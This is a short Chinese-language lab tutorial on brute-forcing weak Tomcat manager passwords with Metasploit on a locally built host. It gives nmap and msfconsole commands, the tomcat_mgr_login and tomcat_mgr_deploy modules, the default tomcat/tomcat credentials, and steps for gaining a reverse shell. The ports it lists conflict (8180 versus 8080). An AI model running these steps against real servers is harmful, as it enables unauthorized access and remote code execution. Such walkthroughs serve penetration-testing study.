Metasploit爆破Tomcat弱口令
Metasploit爆破Tomcat弱口令

0x00 tomcat 爆破
- nmap 扫描主机 【依然本地搭建的】执行命令 nmap –sV 192.168.6.16

可以发现8080端口开着tomcat
- kali终端中输入命令“msfconsole”,启动MSF终端。

- 在msf终端下输入命令“search tomcat”, 搜索tomcat的相关工具和攻击载荷

在终端输入“use auxiliary/scanner/http/tomcat_mgr_login”, 启用漏洞利用模块, 提示符就会提示进入到该路径下

在终端输入“show options ” 查看需要配置的参数

终端下输入“set RHOSTS 192.168.6.16”,设置攻击目标主机IP
终端下输入“set RPORT 8180”,设置攻击目标主机端口号

终端下输入“exploit”, 实施攻击

账户密码都是tomcat
- 0x01 反弹shell,建立会话
- 终端下输入“use exploit/multi/http/tomcat_mgr_deploy”

终端下输入“set RHOST 192.168.6.16”,设置攻击的目标主机IP
终端下输入“set RPORT 8080”,设置攻击目标主机端口号
终端下输入“set username tomcat”,设置攻击时使用的登录账号tomcat
终端下输入“set password tomcat”,设置攻击时使用的密码tomcat
run 开始攻击